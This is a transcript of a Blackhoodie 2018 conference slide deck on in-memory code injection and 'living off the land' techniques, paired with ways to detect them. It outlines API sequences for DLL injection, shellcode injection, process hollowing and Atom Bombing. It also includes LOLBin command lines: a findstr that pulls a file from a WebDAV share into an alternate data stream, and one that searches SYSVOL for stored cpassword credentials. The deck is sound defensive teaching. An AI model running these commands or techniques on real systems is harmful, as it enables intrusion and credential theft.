Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How...
Transcript of Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How...
![Page 1: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/1.jpg)
Hidden in plain sight?Blackhoodie 2018
![Page 2: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/2.jpg)
Hidden in plain sight
Essy - @casheeew
3rd time Blackhoodie attendee
I’m really just curious (:
( it’s addictive)
![Page 3: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/3.jpg)
Hidden in plain sight
The infamous shoulder of giantssee credits at the end
Essy - @casheeew
3rd time Blackhoodie attendee
I’m really just curious (:
( it’s addictive)
![Page 4: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/4.jpg)
- Attack-Kill-Chain - Tools- How do they work?- What is this in memory stuff?- How do we detect it?
- Living off the land playground- Conclusion- Rabbitholes
> rundll32 presentation.dll,Agenda
![Page 5: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/5.jpg)
- Attack-Kill-Chain - Tools- How do they work?- What is this in memory stuff?- How do we detect it?
- Living off the land playground- Conclusion- Rabbitholes
> rundll32 presentation.dll,Agenda
It’s been a long dayYou’ve heard a lot of stuff.Let’s try to keep it relaxed (:
![Page 6: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/6.jpg)
> msbuild.exe attack_killchain.csproj
Recon Weaponize Deliver Exploit Install C2 Actions
Tools &Techniques
![Page 7: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/7.jpg)
- …
- Bloodhound
- Metasploit Framework
- PowerShell Empire
- ...
> InstallUtil.exe /U Tools.dll
see https://github.com/emilyanncr/Windows-Post-Exploitation
![Page 8: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/8.jpg)
Developed: 2016Author: Andrew Robbins,
Rohan Vazarkar,Will Schroeder
Technology: JavascriptElectronneo4jPS/C# ingestor
Techniques: Visualizerelationships
Bloodhound
- Graph theory to reveal relationships in ADs
- Goal: Quickly identify complex attack paths
- Graph queries are build via Cypher
- memberOf- hasSession- AdminTo- ACLs- CanRDP- ...
- Red & Blue team tool
![Page 9: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/9.jpg)
![Page 10: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/10.jpg)
![Page 11: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/11.jpg)
Developed: 2003Author: H.D. Moore
Language: Ruby
Technqiues: Public exploits,post exploitation modules, auxiliary modules, ...
Metasploit Framework
Meterpreter
- advanced multifunction payload
- multi platform - encrypted communication
Process injection- injects itself into a running
process- uses reflective DLL
injection- metsrv.dll’s header can be
modified to be usable as shellcode
![Page 12: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/12.jpg)
Developed: 2015Author: Will Schroeder,
Matt Nelson,Justin Warner
Language: Python,Powershell
Technqiues: Post-Exploitation without powershell.exe
PowerShell Empire
Modules- code_execution- collection- credentials- lateral_movement- management- persistence- privesc- situational_awareness- trollsploit
Process injectionlauncher code for the agent is embedded in the .DLL
After the initial payload all subsequent attacks are stored in memory
![Page 13: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/13.jpg)
But how does it work?
![Page 14: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/14.jpg)
(In)-Memory stuff & Code injection
Techniques:- Remote DLL injection- Remote Shellcode injection- Reflective DLL injection- Process Hollowing- APC injections
- Atombombing- Gargoyle (ROP/APCs)
- Injection via Shims- Inline Hooking- <insert more rabbit holes here>
![Page 15: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/15.jpg)
(In)-Memory stuff & Code injection
Techniques:- Remote DLL injection- Remote Shellcode injection- Reflective DLL injection- Process Hollowing- APC injections
- Atombombing- Gargoyle (ROP/APCs)
- Injection via Shims- Inline Hooking- <insert more rabbit holes here>
Disk
![Page 16: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/16.jpg)
![Page 17: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/17.jpg)
Remote DLL injection
OpenProcess VirtualAllocEx WriteProcessMemory
CreateRemoteThread -> LoadLibrary
---LdrLoadDll (native)
Typical API calls
Our process Victim processOpenProcess()
VirtualAllocEx()
WriteProcessMemory(path) “C:\temp\evil.dll”
GetModuleHandle()
GetProcAddress()CreateRemoteThread() LoadLibrary(“evil.dll”)
evil.dll
evil.dll
PROCESS_CREATE_THREADPROCESS_VM_OPERATIONPROCESS_VM_WRITE
PAGE_READWRITE
![Page 18: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/18.jpg)
Hidden in plain sight?
![Page 19: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/19.jpg)
Remote DLL injection - Detection examples
OpenProcess VirtualAllocEx WriteProcessMemory
CreateRemoteThread -> LoadLibrary
---LdrLoadDll (native)
Typical API calls
- not easy to distinguish between malicious DLL and explicitly loaded DLLs in the victim process (‘LoadLibrary’)
- injected DLL hides in plain side, just try- listdlls- Process Explorer- Process Hacker
- it blends in with legitmate modules
- Chances of detection are higher if we try to hide the DLL, e.g.- unlink its entry from _LDR_DATA_TABLE_ENTRY (ldrmodules)- unpack and copy decompressed code to new memory region
- Modern detections track & flag ‘CreateRemoteThread’
![Page 20: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/20.jpg)
Remote DLL injection - Detection examples
OpenProcess VirtualAllocEx WriteProcessMemory
CreateRemoteThread -> LoadLibrary
---LdrLoadDll (native)
Typical API calls
- not easy to distinguish between malicious DLL and explicitly loaded DLLs in the victim process (‘LoadLibrary’)
- injected DLL hides in plain side, just try- listdlls- Process Explorer- Process Hacker
- it blends in with legitmate modules
- Chances of detection are higher if we try to hide the DLL, e.g.- unlink its entry from _LDR_DATA_TABLE_ENTRY (ldrmodules)- unpack and copy decompressed code to new memory region
- Modern detections track & flag ‘CreateRemoteThread’
not fancy enough, let’s move on...
![Page 21: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/21.jpg)
Remote Shellcode injection
OpenProcess VirtualAllocEx
WriteProcessMemory CreateRemoteThread
---LdrLoadDll (native)
Typical API calls
1. Our process allocates memory in the victim process using ‘VirtualAllocEx’ with the ‘PAGE_EXECUTE_READWRITE’ protection
2. Our process transfers a block of code to the victim process using ‘WriteProcessMemory’
3. Our process calls ‘CreateRemoteThread’ and points the thread’s starting address to a function within the transferred block of code inside the victim process
![Page 22: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/22.jpg)
Hidden in plain sight?
![Page 23: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/23.jpg)
Remote shellcode injection - Detection examples
OpenProcess VirtualAllocEx
WriteProcessMemory CreateRemoteThread
---LdrLoadDll (native)
Typical API calls
Tools to investigate:- Process Hacker- Process Explorer (Sysinternals)- listdlls (Sysinternals command-line utility)- Or use the Windows API functions (see CreateToolhelp32Snapshot)
- Volatility plugin ‘malfind’- look for readable, writeable and executable private memory
regions- regions will contain shellcode (or PE header)- malfind displays hex dump and disassembly
![Page 24: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/24.jpg)
Remote shellcode injection - Detection examples
OpenProcess VirtualAllocEx
WriteProcessMemory CreateRemoteThread
---LdrLoadDll (native)
Typical API calls
Tools to investigate:- Process Hacker- Process Explorer (Sysinternals)- listdlls (Sysinternals command-line utility)- Or use the Windows API functions (see CreateToolhelp32Snapshot)
- Volatility plugin ‘malfind’- look for readable, writeable and executable private memory
regions- regions will contain shellcode (or PE header)- malfind displays hex dump and disassembly
still too easy...let’s try harder
![Page 25: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/25.jpg)
Reflective DLL injection
CreateToolhelp32SnapshotProcess32First Process32Next
OpenProcess VirtualAllocEx WriteProcessMemory ! CreateRemoteThreadNtCreateThreadExRtlCreateUserThread
Typical API calls
Our process
GetModuleHandle()
Victim process
GetProcAddress()
evil.dllrecv(evil.dll, buff)
VirtualAllocEx(sizeof(buff))
CreateRemoteThread( )
WriteProcessMemory()
see https://github.com/stephenfewer/ReflectiveDLLInjection
responsible for loading itselfimplements minimal PE file loader
evil.dll
ReflectiveLoad()
Context
![Page 26: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/26.jpg)
see https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
“[...], Empire has the ability to inject an agent into another process usingReflectivePick to load up the .NET common language runtime into a process and execute a particular PowerShell command, all without starting a new powershell.exe process!”
“ [...] a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation. Due to its' reflective property, it can be injected into any process using a reflective injector and allows the execution of Powershell code by any process”
see https://www.powershellempire.com/?page_id=273
![Page 27: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/27.jpg)
Hidden in plain sight?
![Page 28: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/28.jpg)
Reflective DLL injection - Detection examples- Again: primary signal: Memory events
How Windows Defender ATP does it: https://cloudblogs.microsoft.com/microsoftsecure/2017/11/13/detecting-reflective-dll-loading-with-windows-defender-atp/
> !address -F:PAGE_EXECUTE_READWRITE
- several larger RWX sections mapped into the process
- allocation size- allocation history- thread information- allocation flags- Volatility plugin ‘malfind’
- look for RWX pages
![Page 29: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/29.jpg)
Reflective DLL injection - Detection examples- Again: primary signal: Memory events
How Windows Defender ATP does it: https://cloudblogs.microsoft.com/microsoftsecure/2017/11/13/detecting-reflective-dll-loading-with-windows-defender-atp/
> !address -F:PAGE_EXECUTE_READWRITE
- several larger RWX sections mapped into the process
- allocation size- allocation history- thread information- allocation flags- Volatility plugin ‘malfind’
- look for RWX pages
Well, well, well. Can we get fancier?
![Page 30: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/30.jpg)
Process Hollowing* Legitimate process is loaded to act as a container for hostile code
1. Create a process in suspended state2. Call ‘ZwUnmapViewSection’ to un-reserve the memory3. Allocate memory using ‘VirtualAlloc’4. Write data to the process memory using ‘WriteProcessMemory’5. Get the thread context via ‘GetThreadContext’6. Modify it and set the desired context via ‘SetThreadContext’7. Call ‘ResumeThread’ to start the process
ZwUnmapViewOfSection NtUnmapViewOfSection
WriteProcessMemory NtCreateSection NtCreateSectionEx
SetThreadContext ResumeThread
VirtualProtectEx
Typical API calls
kernel32.dll
ntdll.dll
PEB
kernel32.dll
ntdll.dll
PEBunchanged
unchanged
unchanged
PID 1337 PID 1337
C:\Windows\system32\calc.exe
Malware (no file association needed)
* see links at the end for a PoC
![Page 31: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/31.jpg)
Hidden in plain sight?
![Page 32: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/32.jpg)
- Volatility- dlllist - ldrmodules - malfind # Show suspicious memory protection- Hollowfind plugin # finds discrapancy in the VAD and PEB
Investigation Hollow Process Injection Using Memory Forensics ← take a look here
Process Hollowing - Detection examples
$ python vol.py -f victim.vmem dlllist -p 1337
$ python vol.py -f victim.vmem ldrmodules -p 1337
$ python vol.py -f victim.vmem malfind -p 1337
$ python vol.py -f victim.vmem hollowfind -p 1337 -D dump/
![Page 33: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/33.jpg)
Atom Bombing
GlobalAddAtom
GlobalGetAtomName
ZwAllocateVirtualMemory
NtQueueApcThreadNtSetContextThread
Typical API calls
Our process
Victim process
GlobalAddAtom()
GlobalGetAtomName()
via APC
RW permissions
copy of malicious code
RWX permissions
malicious code
ROP
Global Atom Table
malicious code<16-bit integer>
CreateRemoteThread( )
![Page 34: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/34.jpg)
Atom Bombing -v
GlobalAddAtom
GlobalGetAtomName
ZwAllocateVirtualMemory
NtQueueApcThreadNtSetContextThread
Typical API calls
- We avoid writing to the victim process with traditional means- We put our shellcode in the global atom table via
GlobalAddAtom()- We queue APC to call GlobalGetAtomName()- We let it gradually build shellcode in a code cave- We use APC again to execute ROP chain to copy to RWX
memory via ZwAllocateVirtualMemory()
![Page 35: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/35.jpg)
Evading memory scanners
This is not the DLL you’re looking for
see ‘The Art of Memory Forensics’
![Page 36: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/36.jpg)
Evading memory scanners - Gargoyle
SetWaitableTimer
WaitForSingleObjectEx
VirtualProtectEx
Typical API calls
see https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html
![Page 37: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/37.jpg)
...but let’s move on
![Page 38: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/38.jpg)
“Living off the land”
![Page 39: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/39.jpg)
**
Living off the land
Execute
Download
Upload Encode
DecodeADS*
CopyCredentialsCompile
AWL bypass
Dump
Reconnaissance
* Alternate Data Streams
** sry not sry for the german only phun
dir C:\Windows\system32\*.exe /s /b | findstr /v .exe > todo.txt
![Page 40: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/40.jpg)
Living off the land - findstr.exeExecute
Download
Upload Encode
DecodeADS
CopyCredentialsCompile
AWL bypass
Dump
Reconnaissance
findstr /V /L TheCakeIsALie \\webdavsrv\folder\file.exe > c:\ADS\file.txt:file.exe
findstr /S /I cpassword \\sysvol\policies\*.xml
thx @Oddvarmoe see https://adsecurity.org/?p=2288
![Page 41: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/41.jpg)
Living off the land - rundll32.exeExecute
Download
Upload Encode
DecodeADS
CopyCredentialsCompile
AWL bypass
Dump
Reconnaissance
thx @subtee
![Page 43: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/43.jpg)
return $conclusion- Hidden depends on your viewpoint
- some techniques are pretty advanced- some detections are pretty good
- Life gets harder for red teamers and attackers?- → approach to blend in with normal (admin) usage becomes more and more appealing
- “Living off the land” techniques combined with advanced in-memory executions: new path of hope to avoid detections? Hype?
- Tools to visualise stuff on the blue side
- RedTeam tooling switches from PS to C#, but that’s a topic for another rabbit hole (;
![Page 44: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/44.jpg)
Expand-Archive -Path presentation.zip -DestinationPath C:\hereberabbitholes[Code] - Bloodhound Repository[Recording] - Extending BloodHound for Red Teamers - Tom Porter [Blog] - Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin [Blog] - Using Bloodhound to Map the Domain [Recording] - Bloodhound: He Attac, but he also Protec - Andy Robbins, Rohan Vazarkar [Blog] - Hidden Administrative Accounts: BloodHound to the Rescue [Links] Active Directory Attacks and Modern Post Exploitation Adversary Tradecraft
[Presentation] - Meterpreter internals [Doku] - Meterpreter Stageless Mode [Code] - Powershell Empire Repository [Recording] - PowerShell Empire - Dave Hull [Recording] - PowerShell Empire Strikes Back by Walter Legowski [Recording] - Learn PowerShell Empire 2 From A to Z[Code] - PowerPick Code Repository
[Recording] - Taking Hunting to the Next Level: Hunting in Memory - SANS Threat Hunting Summit 2017 [Blog] - Loading a DLL from memory [Blog] - Hunting in Memory [Blog] - PowerShell: In-Memory Injection Using CertUtil.exe [Blog] - Memory injection like a boss [Code] - ReflectiveDLL Injection Repository
[Blog] - Reflective DLL Injection with PowerShell [Recording] - Reflective DLL Injection Metasploit Module [Blog] - Metasploit Payload-Types [Paper] - Remote library injection
![Page 45: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/45.jpg)
Expand-Archive -Path presentation.zip -DestinationPath C:\hereberabbitholes[Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing technique [Recording] - Investigation Hollow Process Ijection Using Memory Forensics[Blog] - Reversing and investigating malware evasive tactivs - Hollow process injection [Code] - PoC Process Hollowing by FuzzySecurity (Start-Hollow.ps1)
[Blog] - Bypassing Memory Scanners with Cobalt Strike and Gargoyle [Presentation] - Memory resident implants - code injection is alive and well by Luke Jennings [Blog] - Gargoyle, a memory scanning evasion technique[Code] - Gargoyle Code Repository [Blog] - Hunting for Gargoyle [Code] - The Memory Process File System
[Recording] - Living Off The Land A Minimalist S Guide To Windows Post Exploitation - Chris Campbell, Matt Graeber [Recording] - LOLBins Nothing to LOL about - Oddvar Moe [Blog] - LOLBAS project website [Code] - LOLBAS code repository
[Book] - The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory [Book] - The Hacker Playbook 3: Practical Guide To Penetration Testing [Book] - What makes it page? The Windows 7 (x64) Virtual Memory Manager
[Whitepaper] - Living off the land and fileless attack techniques by Symantec [Tools] - Awesome Windows Post-Exploitation tool list
![Page 46: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/46.jpg)
Awesome people to follow for these ++other_exciting_topics
@CptJesus@_wald0 @danielhbohannon @harmj0y @mattifestation @Oddvarmoe @subtee @SadProcessor @jalospinoso @PyroTek3 @FuzzySec @_RastaMouse @epakskape @DirectoryRanger@jukelennings @dk_effect @Alshakarti .
@AmarSaar @_marklech_ @0xAlexei @TinySecEx @jepayneMSFT@NerdPyle@VirtualScooley @xedi25 @curi0usJack @hFireF0X @Intel80x86@0patch@aall86@TheColonial@obscuresec@kiqueNissim@thatchriseckert @WDSecurity @JohnLaTwC
@brucedang @attrc @Code_Analysis@j00ru @long123king@aionescu @epakskape@aluhrs13@girlgerms@ryHanson@_xpn_@ericlaw@dwizzzleMSFT@jaredhaight
..and many many more I guess...
![Page 47: Hidden in plain sight? - Blackhoodie · 2020-05-29 · [Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security [Blog] - Attack Mitre Process Hollowing](https://reader035.fdocuments.in/reader035/viewer/2022081522/5f046ab47e708231d40ddd21/html5/thumbnails/47.jpg)
wmic.exe /node:”audience” process call create “questions.exe”